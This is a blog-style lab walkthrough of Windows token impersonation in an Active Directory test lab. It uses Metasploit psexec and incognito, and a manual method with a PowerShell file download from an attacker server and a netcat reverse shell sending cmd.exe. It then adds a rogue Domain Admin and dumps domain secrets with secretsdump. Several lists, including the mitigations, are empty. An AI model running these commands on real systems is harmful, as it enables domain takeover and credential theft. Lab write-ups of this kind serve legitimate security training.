
Going Beyond the Firewall.

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Token Impersonation Attack


For ease of understanding, you can think of tokens as cookies for the computer. These temporary keys allow you access to a system, a network, or a resource without providing the credentials. A web pentester can think of them as cookies or tokens (JWT etc) for accessing credential-protected resources. A great thing about tokens is that they persist until the next reboot. When a user logs off, their delegate token is reported as an impersonate token. But that token will still hold all the rights of a delegate token.

Types of Tokens

There are two types of tokens

Token impersonation is a Windows post-exploitation technique that allows an attacker to steal the access token of a logged-on user on the system without knowing their credentials and impersonate them to perform operations with their privileges. soruce

Token Impersonation Attack DEMO (Metasploit & Manual Method)

Tools required to perform this attack:

Scenario: I already have an Active Directory Attack Lab setup that comprises of 1 Domain Controller and 2 Windows 10 machines. For this attack i only need to start up the Domain Controller and 1 target machine. Since this is a post exploitation attack, i have already obtained valid login credentials to the machine through an LLMNR Poisoning attack. Read more here

Using Metasploit

Step 1: Start metasploit

We have to first of all gain access to the target machine using the psexec module in metasploit. We already have valid credentials for our target which was obtained after performing an LLMNR Poisoning attack.

Step 2: Search for psexec

Step 3: Set required options

Now to set required options: RHOSTS, SMBDomain, SMBPass, SMBUser, Payload

Step 4: run the exploit

Options set, now to run the exploit:

meterpreter shell access obtained as NT AUTHORITY\SYSTEM

Step 5: Load incognito module

Now for the Token Impersonation Attack, We first of all load the incoginito module:

load incognito

Step 6: List available tokens

Now the module is loaded, we need to list the available tokens:

list_tokens -u

Step 7: Impersonate a user

We can impersonate the fcastle user. Note: In a real world scenario, we would have to wait for users to logon to their machines.

Impersonating the user fcastle:

impersonate_token DEUSX\\fcastle we add an additional \ for character escape.

Step 8: Impersonate Domain Admin User

We are now the fcastle user. Next up is to simulate a login on the machine as an admin and then check the token list again.

Domain Administrator login:

First run rev2self to go back to NT AUTHORITY\SYSTEM then list the tokens:

Now to impersonate the Admin:

Now that we are Domain Admin we can add user to the Domain:

net user /add username password /domain

Adding the user to the Domain Admins group

net group "Domain Admins" username /ADD /DOMAIN

The user has been added successfully and the user was also added to the Domain Admins group.

To confirm we can login and check the list of users:

With this new user we can now dump credentials from the domain using secretsdump.

impacket-secretsdump DOMAIN/username:'password'@IP

Manual Exploitation

Tools required:

Step 1: Gain Shell Access using psexec DOMAIN/username:'password'@Target_IP

NOTE: I am using kali and i already have all impacket tools installed which is why i am running psexec using impacket-psexec

Step 2: Transfer binaries (incognito & netcat) to Target system

First start a python server:

Then run the following on the Target machine:

python3 -m http.server

powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://IP:PORT/file', 'C:\file')"

Step 3: List tokens

incognito.exe list_tokens -u

Currently there are no users to impersonate so let’s simulate a user logging on to the machine:

Run the command again:

Now the user fcastle is present, We can decide to impersonate the regular user but let’s wait for an Administrator to logon to the machine:

Now let’s check the tokens again:

Step 4: Impersonate the Domain Admin

Yes, we can now impersonate the Domain Administrator. First up we setup a netcat listener on any port and wait for a connection.

nc -lvnp 4444

Now we impersonate the Domain Admin and connect to the netcat listener to spawn a CMD shell. If we were to spawn a CMD shell directly, it won’t work and will just hang which is why we are making use of a reverse shell.

Now to execute the following on the target machine:

incognito.exe execute -c "DOMAIN\user" "nc64.exe IP PORT -e cmd.exe"

Step 5: Create a new user

Now we are the Domain Administrator. Let’s test our privileges by adding a new user and joining them to the “Domain Admins” group.

Adding a user:

adding a user: net user /add username password /domain

adding user to group: net group "Domain Admins" username /ADD /DOMAIN

To confirm we can login to the Domain Controller and check:

Step 5: Dump secrets from Domain Controller

With this new user we can now dump credentials from the domain using secretsdump:

impacket-secretsdump DOMAIN/user:'password'@IP

We have successfully dumped secrets from the Domain Controller

Token Impersonation Attack Mitigation

Following are some mitigation techniques for preventing Token Impersonation Attacks

In short, it is all about choosing the right policies and then their implementation. If the right security policies are in place, it would make the job of an attacker much more difficult. source

Thanks for Reading till the End 👋